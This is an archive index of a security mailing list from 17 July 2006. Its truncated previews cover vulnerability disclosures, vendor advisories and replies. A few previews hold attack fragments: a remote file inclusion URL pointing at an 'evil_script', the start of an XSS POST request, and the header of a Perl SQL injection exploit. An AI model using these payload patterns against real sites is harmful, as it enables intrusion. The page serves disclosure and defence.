Mercury Messenger

2006-07-17 Thread Hans Wolters
Problem description: Mercury Messenger, http://www.mercury.to/, is a Java-based messenger that will allow its users to chat with MSN users. Currently it has been noted by two people that on a multi-user OS X platform it is possible to read the chat logs from other users. The user specific

Re: Bybass HTTP ( extension files ) in ISA 2004

2006-07-17 Thread Thor (Hammer of God)
I cannot reproduce this on either ISA2004 or ISA2006. Configuring the HTTP filter to block file extensions functions as expected with or without the "#". You've probably misconfigured your firewall, or have some other issue. Can you please provide details on your configuration? T --- New Black

Several updates in MS PowerPoint 0-day Vulnerability FAQ at SecuriTeam Blogs

2006-07-17 Thread Juha-Matti Laurio
Several updates to the Microsoft PowerPoint 0-day Vulnerability FAQ document have been made. New items added, related Trojan horse payload information updated etc. Link to the document is http://blogs.securiteam.com/?p=508 - Juha-Matti

PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

2006-07-17 Thread chris_hasibuan
#SolpotCrew Community # #PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion # #Vendor site : http://www.softcomplex.com/products/php_event_calendar/ # #

Calendar Module <= 1.5.7 Remote File Include Vulnerabilities

2006-07-17 Thread matdhule
- Calendar Module <= 1.5.7 Remote File Include Vulnerabilities - Author : Matdhule Contact : [EMAIL PROTECTED] Application : Calend

Plesk Control Panel <= 8.0.0 XSS vulnerability

2006-07-17 Thread vuln . invent
Product: Plesk control panel Version: <= 8.0.0 Vendor: SWSoft Inc. URL: http://www.swsoft.com/en/products/plesk/ VULNERABILITY CLASS: XSS [Product Description] Plesk is comprehensive server management software developed specifically for the Hosting Service Industry with the assistance

Re: Phorum 5.1.14 XSS SQL injection Vulnerability

2006-07-17 Thread Maurice Makaay
About the Phorum security issues as reported by Ellipsis: -- Cross Site Scripting (XSS) -- POST http://target.xx:80/posting.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: target.xx Content-Length: 447 message_id=0&fo

Secunia Research: IceWarp Web Mail Two File Inclusion Vulnerabilities

2006-07-17 Thread Secunia Research
== Secunia Research 17/07/2006 - IceWarp Web Mail Two File Inclusion Vulnerabilities - == Table of Contents Affected Software.

[SECURITY] [DSA 1109-1] New rssh packages fix privilege escalation

2006-07-17 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1109-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 16th, 2006

RE: Bybass HTTP ( extension files ) in ISA 2004

2006-07-17 Thread Edward Tripovich
Tested this on ISA 2004. I cannot reproduce this. The ISA server blocks a given extension, with or without the # at the end of the file extension. Special config maybe? Edward [EMAIL PROTECTED] wrote: hi ppl i just discover a bug in Microsoft Internet Security and Acceleration (ISA) Server

rPSA-2006-0130-1 kernel

2006-07-17 Thread Justin M. Forbes
rPath Security Advisory: 2006-0130-1 Published: 2006-07-17 Products: rPath Linux 1 Rating: Critical Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: kernel=/[EMAIL PROTECTED]:devel//1/2.6.16.26-0.1-1 References: http://www.cve.mitre.org/cgi

[EEYEB-20060227] D-Link Router UPNP Stack Overflow

2006-07-17 Thread eEye Advisories
D-Link Router UPNP Stack Overflow Release Date: July 13, 2006 Date Reported: February 27, 2006 Patch Development Time (In Days): 136 Severity: High (Remote Code Execution) Vendor: D-Link Routers Affected: DI-524 Rev A DI-524 Rev C DI-524 Rev D DI-604 Rev E DI-624 Rev C DI-624 Rev D DI-784 Re

Secunia Research: VisNetic Mail Server Two File Inclusion Vulnerabilities

2006-07-17 Thread Secunia Research
== Secunia Research 17/07/2006 - VisNetic Mail Server Two File Inclusion Vulnerabilities - == Table of Contents Affected Software..

[SECURITY] [DSA 1110-1] New samba packages fix denial of service

2006-07-17 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1110-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 16th, 2006

Secunia Research: BitZipper unacev2.dll Buffer Overflow Vulnerability

2006-07-17 Thread Secunia Research
== Secunia Research 17/07/2006 - BitZipper unacev2.dll Buffer Overflow Vulnerability - == Table of Contents Affected Software.

PacSec 2006 CALL FOR PAPERS (Deadline Aug. 4; Event Nov. 27-30)

2006-07-17 Thread Dragos Ruiu
url: http://pacsec.jp PacSec 2006 CALL FOR PAPERS World Security Pros To Converge on Japan TOKYO, Japan -- To address the increasing importance of information security in Japan, the best known figures in the international security industry will get together with leading Japanese researc

boastMachine <= 3.1 SQL Injection Exploit

2006-07-17 Thread gmdarkfig
#!/usr/bin/perl # # VulnScr: boastMachine version 3.1 and prior # Web: http://boastology.com/ # # Date: Sun July 16 10:43 PM 2006 # Credits: DarkFig ([EMAIL PROTECTED]) # Vuln: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Predictable Backup Filename

ListMessenger v0.9.3 Remote File Inclusion Vulnerability

2006-07-17 Thread x0r0n
ListMessenger v0.9.3 Remote File Inclusion Vulnerability - Discovered By : xoron - Contact : x0r0n[at]hotmail.com - script: ListMessenger 0.9.3 - URL: http://www.listmessenger.com - Exp: www.target.com/[path]/enduser/listmessenger.php?lm_path=evil_script? - Code: require_o

Multiple vulnerabilities in UFO2000 svn 1057

2006-07-17 Thread Luigi Auriemma
### Luigi Auriemma Application: UFO2000 http://ufo2000.sourceforge.net Versions: <= SVN 1057 Platforms:Windows, *nix, *BSD, Mac and more Bugs: A] buffer-overflow in rec

[SECURITY] [DSA 1111-1] New Linux kernel 2.6.8 packages fix privilege escalation

2006-07-17 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA -1[EMAIL PROTECTED] http://www.debian.org/security/ Dann Frazier Jul 16th, 2006